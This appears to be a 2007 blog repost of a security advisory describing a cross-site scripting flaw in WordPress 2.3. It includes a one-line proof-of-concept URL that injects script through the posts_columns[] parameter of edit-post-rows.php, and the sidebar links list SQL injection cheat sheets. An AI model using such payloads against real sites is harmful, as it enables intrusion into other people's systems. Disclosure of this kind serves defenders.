RSS FullRecent Posts
- adware removal downloads
- Discover Information About Agile Web Development with Rails 2nd …
- Blind SQL Injections
- SQL Injection Cheat Sheet 2
- What is SQL Injection, and SQL Injection Cheat Sheet 1
Recent Comments
- luca on XSS in mysql_error()
- Jacob Tuscon on SQL Power Injector 1.2 released - TechRepublic
- MySQL Security » MySQL Security Update Fixes Restrictions Bypass and Library … on MySQL Security Update Fixes Restrictions Bypass and Library ...
[waraxe-2007-SA#059] - XSS in WordPress 2.3
Filed under email-post, rsd, adl, asap, permanent-link, utf, atom, xss, edit-me, edit-post, bugtraq-security-focus
“register_globals” must be “on” for this exploit to be successful. Proof of concept:. http://victim.com/wp-admin/edit-post-rows.php?posts_columns[]=alert(123);. //—–> See ya soon and have a nice day
See the rest here:
[waraxe-2007-SA#059] - XSS in WordPress 2.3
Related Posts
- Nice Exploit Code I Found in my Wordpress
- Sql Injection in WordPress 2.1.3
- Video Tutorial SQL Injection
- New Exploit In WordPress
- Phonon : where QT and KDE meet
October 27th, 2007.
Leave a Comment